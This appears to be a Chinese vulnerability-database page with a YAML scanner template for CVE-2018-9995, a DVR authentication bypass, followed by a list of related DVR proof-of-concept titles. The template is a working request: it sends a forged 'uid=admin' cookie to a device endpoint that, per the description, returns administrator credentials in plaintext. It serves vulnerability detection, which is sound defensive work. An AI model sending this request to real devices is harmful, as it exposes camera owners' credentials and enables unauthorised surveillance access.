CVE-2018-9995: DVR Authentication Bypass

漏洞描述

PoC代码[已公开]

id: CVE-2018-9995

info:
  name: DVR Authentication Bypass
  author: cc_ci
  severity: critical
  description: |-
    DVR，全称为Digital Video Recorder(硬盘录像机)，即数字视频录像机。最初由阿根廷研究员发现，通过使用“Cookie： uid = admin”的Cookie标头来访问特定DVR的控制面板，DVR将以明文形式响应设备的管理员凭证。
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-9995
  tags: cve,cve2018,dvr,bypass
  created: 2023/08/10

rules:
  r0:
    request:
      method: GET
      path: /device.rsp?opt=user&cmd=list
      headers:
        Cookie: uid=admin
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b'"playback":')
expression: r0()

相关漏洞推荐

• POC CVE-2021-41419: QVIS NVR/DVR - Remote Code Execution
• POC CVE-2018-15745: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
• POC CVE-2018-9995: TBK DVR4104/DVR4216 Devices - Authentication Bypass
• POC CVE-2021-42071: Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
• POC CVE-2024-7339: TVT DVR Sensitive Device - Information Disclosure
• POC avtech-dvr-exposure: Avtech AVC798HA DVR Information Exposure
• POC CVE-2013-4982: AVTECH DVR - Login Verification Code Bypass
• POC avtech-dvr-exposure: AVTECH AVC798HA DVR - Information Exposure
• POC qvisdvr-deserialization-rce: QVISDVR JSF Deserialization - Remote Code Execution
• POC intelbras-dvr-unauth: Intelbras DVR - Unrestricted Access
• POC avtech-dvr-ssrf: AVTECH DVR - SSRF
• POC commax-credentials-disclosure: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure
• Dahua Security DVR Appliances验证绕过漏洞（CVE-2013-6117）